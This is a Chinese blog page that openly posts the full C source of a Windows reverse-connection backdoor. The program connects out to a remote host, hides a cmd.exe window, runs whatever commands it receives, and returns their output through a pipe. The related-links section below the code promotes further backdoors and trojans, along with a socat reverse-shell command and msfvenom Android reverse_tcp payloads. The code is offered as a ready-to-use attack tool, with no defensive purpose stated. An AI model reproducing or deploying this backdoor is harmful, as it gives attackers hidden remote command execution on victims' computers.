反向连接后门源码

最新推荐文章于 2022-02-28 09:51:46 发布
最新推荐文章于 2022-02-28 09:51:46 发布
阅读量237 收藏
点赞数
文章标签: Socket Security .net
本文展示了一个使用 Winsock 实现的反向连接示例程序,通过该程序可以建立从目标主机到本地主机的连接,并能通过管道读取 cmd 命令输出。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#include<winsock2.h>
#include<stdio.h>

#pragmacomment(lib,"ws2_32.lib")

voidmain(intargc,char**argv)
{
char*messages=" ========================BackConnectBackDoorV0.1======================== =========WelcometoHttp://www.hackerxfiles.net========= ";
WSADATAWSAData;
SOCKETsock;
SOCKADDR_INaddr_in;
charbuf1[1024];//作为socket接收数据的缓冲区
memset(buf1,0,1024);//清空缓冲区

if(WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartuperror.Error:d ",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80);//反向连接的远端主机端口
addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");//远端IP

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socketfailed.Error:d ",WSAGetLastError());
return;
}
if(WSAConnect(sock,(structsockaddr*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)//连接客户主机
{
printf("Connectfailed.Error:d",WSAGetLastError());
return;
}

if(send(sock,messages,strlen(messages),0)==SOCKET_ERROR)//发送欢迎信息
{
printf("Sendfailed.Error:d ",WSAGetLastError());
return;
}

charbuffer[2048]={0};//管道输出的数据

for(charcmdline[270];;memset(cmdline,0,sizeof(cmdline))){
SECURITY_ATTRIBUTESsa;//创建匿名管道用于取得cmd的命令输出
HANDLEhRead,hWrite;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
if(!CreatePipe(&hRead,&hWrite,&sa,0))
{
printf("ErrorOnCreatePipe()");
return;
}

STARTUPINFOsi;
PROCESS_INFORMATIONpi;
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"\cmd.exe/c");

intlen=recv(sock,buf1,1024,NULL);
if(len==SOCKET_ERROR)exit(0);//如果客户端断开连接,则自动退出程序
if(len<=1){send(sock,"error ",sizeof("error "),0);continue;}


strncat(cmdline,buf1,strlen(buf1));//把命令参数复制到cmdline
if(!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
send(sock,"Errorcommand ",sizeof("Errorcommand "),0);
continue;
}

CloseHandle(hWrite);
//循环读取管道中数据并发送,直到管道中没有数据为止
for(DWORDbytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){
send(sock,buffer,strlen(buffer),0);
}
}

}
iteye_21064
关注
反向连接后门的使用
djyangmaowei的专栏
05-29 1449
这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实现的这是一个单管道的程序 为此我还专门看了一下书中所讲的零管道和双管道用瑞士军刀进行监听 最后得到一个cmd shell是不是溢出攻击也是要用到这个哟 嘿嘿 幻想... #include#include#pragma comment(lib,"ws2_32.lib")void m
新版二开彩虹易支付整站源码批发 全开源全解密去后门 亲测一点问题没有
qq_49257458的博客
12-20 1447
1、环境配置 推荐系统为:Linux系统 CentOS 7.6 环境:Nginx 1.20.1+MySQL 5.6.50+PHP7.2+Redis【是php里插件,打开php-安装扩展-找到redis安装即可】 2、使用二级域名新建站点,将后端源码上传解压,运行目录为Public 、伪静态设置为Thinkphp 3、用服务器登录软件ssh或者宝塔终端登录服务器执行以下命令 sudo rpm -Uvh https://packages.microsoft.com/config/
后门程序BDoor及源码
05-02 1379
提交时间:2005-04-22提交用户:ffantasyYD工具分类:后门程序运行平台:Windows工具大小:316825 Bytes文件MD5 :95e120d97967a3679dfdbd82985ea1ca工具来源:http://www.uestc.edu.cn/web/default.aspx这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码
反向链接--后门
zsms1314的博客
02-28 1464
1,安装socat库 (centos) yum install socat http://www.dest-unreach.org/socat/download/ socat库下载地址 2,安装方式 ./configure make make install 3,使用方式 server端 socat file:tty,raw,echo=0 tcp-listen:5081 client端 socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:xx.xx
包含详细注释的pingback后门C源代码
07-06 814
#include #include #include //#include #include #define ICMP_ECHO 8          // ICMP回显请求报文的类型值为8 #define ICMP_ECHOREPLY 0      // ICMP回显应答报文的类型值为0 #define SNIFFER_ICMP_SIZE 101    // 监听ICMP包的大? #d
(源码)基于Python的Nightof19逆向Shell连接与自动网页后门触发工具.zip
最新发布
02-14
1. 反弹Shell会话: 工具能够从以太网切换到蓝牙控制,实现Shell会话的反向连接。 2. 设备监控与配置: 通过串行通信与Arduino等设备建立连接,并展示配置信息。 3. 模拟黑客攻击场景: 提供模拟黑客攻击公司内部网络的...
【微盘】基金宝带余额宝版 已去后门,整套源码
04-14
【微盘】基金宝带余额宝版 已去后门,整套源码是一套针对金融理财领域的软件系统,主要用于基金管理和投资。该系统已经经过处理,移除了潜在的安全隐患,确保用户数据的安全性。其核心是为用户提供一个集基金交易、...
一款PHP商城可以自定义上传商品整站源码打包「无后门
03-10
"无后门"是安全性的保证,表示源码中没有预留任何恶意的隐藏通道,用户可以放心使用。 【描述解析】 "源码语言:php"确认了该商城系统的开发语言是PHP,这是一种广泛用于Web开发的服务器端脚本语言,尤其在构建动态...
Android后门源码:msfvenom生成的稳定Android APK
对于Android平台,后门应用程序通常通过msfvenom生成,指定特定的载荷(payload),例如`android/meterpreter/reverse_tcp`,这是一种特殊的恶意代码,可以在远程攻击者和目标设备之间建立一个反向连接的通道,允许...
后门程序源码wxhshell
07-02
wxhshell V1.0是我根据winshell编写的。winshell是一个非常不错的后门程序,但是现在已经<br>有些过时了,于是我写了一个新的wxhshell,在这款后门里我采用了端口复用技术,因此可<br>以突破一些防火墙。其运行不影响正常端口的工作。<br>注意:本后门对于采用了独占方式的端口无法绑定,经测试XP系统端口135,445,1025,1028,<br>1045无法绑定,其他端口基本上都可以。由于当前的防火墙对系统端口屏蔽比较严,因此这<br>应该算不上缺陷。<br>用UPX压缩后还不到35k,比winshell还小。可以说在后门里算是非常小的了。<br>密码:xuhuanlingzhe<br>服务名:Wxhshell<br>服务显示名:Wxhshell Service<br>服务描述信息:Wrsky Windows CmdShell Service<br>注册表键名:Wxhshell<br>默认端口:5000<br>最大连接数:100
经典反向后门源代码(可用)vc++6.0反弹木马
12-14
经典反向后门源代码(可用)vc++6.0反弹木马
著名后门nameless源代码NameLess BackDoor V1.14(稳定版)
09-14
著名后门nameless的源代码 可以自己修改 虽然有点老 但是思路还是很值得借鉴的
Delphi编写本地溢出反向连接通用ShellCode
01-13
{ SinDoor One By Anskya Email:Anskya@Gmail.com Web:Www.Anskya.Net QQ:115447 说明:打开NC监听本地8848端口~运行程序返回一个Shell,本程序ShellCode:是通用ShellCode..内部镶有API搜索引擎和数据代码融合(很简单的技术,病毒和ShellCode都用得到),有兴趣大家自己用Debug跟一下我就不对说了... 感谢zhengxi's Crc32函数,Vecna API函数搜索引擎和29A的病毒杂志,还有pker的~API搜索引擎范例。--我没有使用ShellCode变型都是原始代码。 为了偷懒就把以前写的System.pas直接拿来用了,System.pas中包含的API搜索引擎在这里没有使用,紧紧是为了引用ExitProcess函数而已. ShellCode部分可以在VC下编写然后提取 ( 小弟是用TASM直接编写用16进制编辑器直接提取.. 关于ShellCode的提取参考可以参考..《C语言直接编写ShellCode》或者就用VC边写边翻译吧。^_^·力气活 ) 本程序仅仅为了演示~Delphi编写ShellCode的示例并没有其他意图}翻译《缓冲区溢出教程》时候的一个小例子。现在身体不行了·也不能写了,索性整理一下发布好了~~大家看一下就知道了,仅仅是个例子.
后门
02-12
后门
五个反弹后门的源代码
01-03 1540
第一个反弹木马代码:作者 iceblood代码 #include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char
1k(程序体积1kb) 反向连接,零管道后门
古剑楠的专栏
09-23 962
1k(程序体积1kb) 反向连接,零管道后门(转)   [ 日期: 2006-05-17 01:06 | 作者: d99 | 来自: 转 | | ]   写ShellCode的时候写的~C版本代码~~没用就丢出来了~CODE:/*  1k(程
黑客编程技术--反向后门连接的实现
Jesus in my place
02-05 3144
      大过年的,一早收到第一封rejection from CS U-Washington Seattle,郁闷。估计明天起还有一批rej要来,何时有offer啊!淡定淡定,要让自己变强大!恩恩!学习去!      反向后门连接,就是把后门程序植入到服务器上,由服务器主动发起对hacker的连接,由此hacker可以突破网络的访问障碍与server通信,并通过后门获取服务器信息。实验环境:server:windows 7 professional edition + vc6.0            
如何基于Python写一个TCP反向连接后门
qq_43743562的博客
02-06 3379
0x0 介绍 在Linux系统做未授权测试,我们须准备一个安全的渗透环境,通常第一件事就是安装虚拟机。且在攻击阶段中还需要对受害系统进行控制。常见的后门大多数是利用Metasploit生成,而目前反病毒产品遇到Metasploit文件签名的程序就会添加特征库作为查杀对象,所以开发出自己的后门程序非常必要。 这篇文章将介绍如何写一个具有反向连接功能的后门反向连接:通常的网络连接程序是由客户端通过服务器开放的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值